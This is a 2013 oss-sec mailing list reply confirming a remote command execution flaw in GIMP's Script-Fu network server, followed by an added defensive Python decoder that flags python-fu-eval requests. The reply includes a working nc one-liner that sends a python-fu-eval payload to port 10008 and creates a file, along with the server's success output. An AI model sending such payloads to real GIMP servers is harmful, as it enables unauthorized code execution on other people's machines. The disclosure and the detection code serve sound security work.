oss-sec mailing list archives
Re: GIMP Scriptfu Python Remote Command Execution
From: Sebastian Pipping <sebastian () pipping org>
Date: Sun, 15 Sep 2013 03:33:44 +0200
On 16.08.2012 23:00, research wrote:
> Affected Products
> =================
> GIMP 2.6 branch (Windows or Linux builds)
>
> Non-Affected Products
> =====================
> The Scriptfu network server component does not currently work in the
> GIMP 2.8 branch (Windows or Linux builds).
I was able to verify that vulnerability with Gimp 2.8.6 on my local
machine so at least some versions of the Gimp 2.8.x series seem affected
to me. This is my shell session:

  $ rm /tmp/owned

  $ p='(python-fu-eval 0 "open('"'"'/tmp/owned'"'"', '"'"'w'"'"')")'; printf "G\x0\x2c%s" "${p}" | nc -w 1 localhost 10008 | od -c
  0000000 G \0 \0 \a S u c c e s s
  0000013

  $ ls -al /tmp/owned
  -rw-r--r-- 1 user user 0 Sep 15 02:56 /tmp/owned

The server started from the GUI seems to be listening anywhere:

  $ netstat -tulpen 2>/dev/null | fgrep script-fu
  tcp 0 0 0.0.0.0:10008 0.0.0.0:* LISTEN 1000 102934 6392/script-fu

Best,

Sebastian
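Added example, not part of the original post or of GIMP: a decoder for the message framing visible in the session above ('G', a 16-bit big-endian length, then text; replies carry an extra status byte before the length), usable to review captured port 10008 traffic for python-fu-eval calls. The function names and the watch list are assumptions of this example, and the sample bytes are constructed from the session plus one benign request.

```python
import struct

MAGIC = ord("G")                  # first byte of both messages in the session above
WATCHED = ("python-fu-eval",)     # procedure used in the post; watch list is an assumption

def parse_request(buf: bytes) -> str:
    """Client request: 'G' + 16-bit big-endian length + script text."""
    if len(buf) < 3 or buf[0] != MAGIC:
        raise ValueError("not a Script-Fu request")
    (length,) = struct.unpack(">H", buf[1:3])
    body = buf[3:3 + length]
    if len(body) != length:
        raise ValueError("truncated request")
    return body.decode("utf-8", "replace")

def parse_response(buf: bytes):
    """Server reply: 'G' + status byte + 16-bit big-endian length + text."""
    if len(buf) < 4 or buf[0] != MAGIC:
        raise ValueError("not a Script-Fu response")
    status, length = struct.unpack(">BH", buf[1:4])
    body = buf[4:4 + length]
    if len(body) != length:
        raise ValueError("truncated response")
    # Status 0 is what the successful reply in the post carries.
    return status == 0, body.decode("utf-8", "replace")

def flag_request(buf: bytes):
    """Return the decoded script and any watched procedure names it mentions."""
    script = parse_request(buf)
    return script, [name for name in WATCHED if name in script]

# Constructed samples: the request and reply bytes from the post's session,
# plus a benign request for comparison.
SAMPLE_REQUEST = b"G\x00\x2c" + b"(python-fu-eval 0 \"open('/tmp/owned', 'w')\")"
SAMPLE_RESPONSE = b"G\x00\x00\x07Success"
BENIGN_REQUEST = b"G\x00\x0e(gimp-version)"

if __name__ == "__main__":
    for raw in (SAMPLE_REQUEST, BENIGN_REQUEST):
        script, hits = flag_request(raw)
        print("ALERT" if hits else "ok   ", hits, script)
    print(parse_response(SAMPLE_RESPONSE))
```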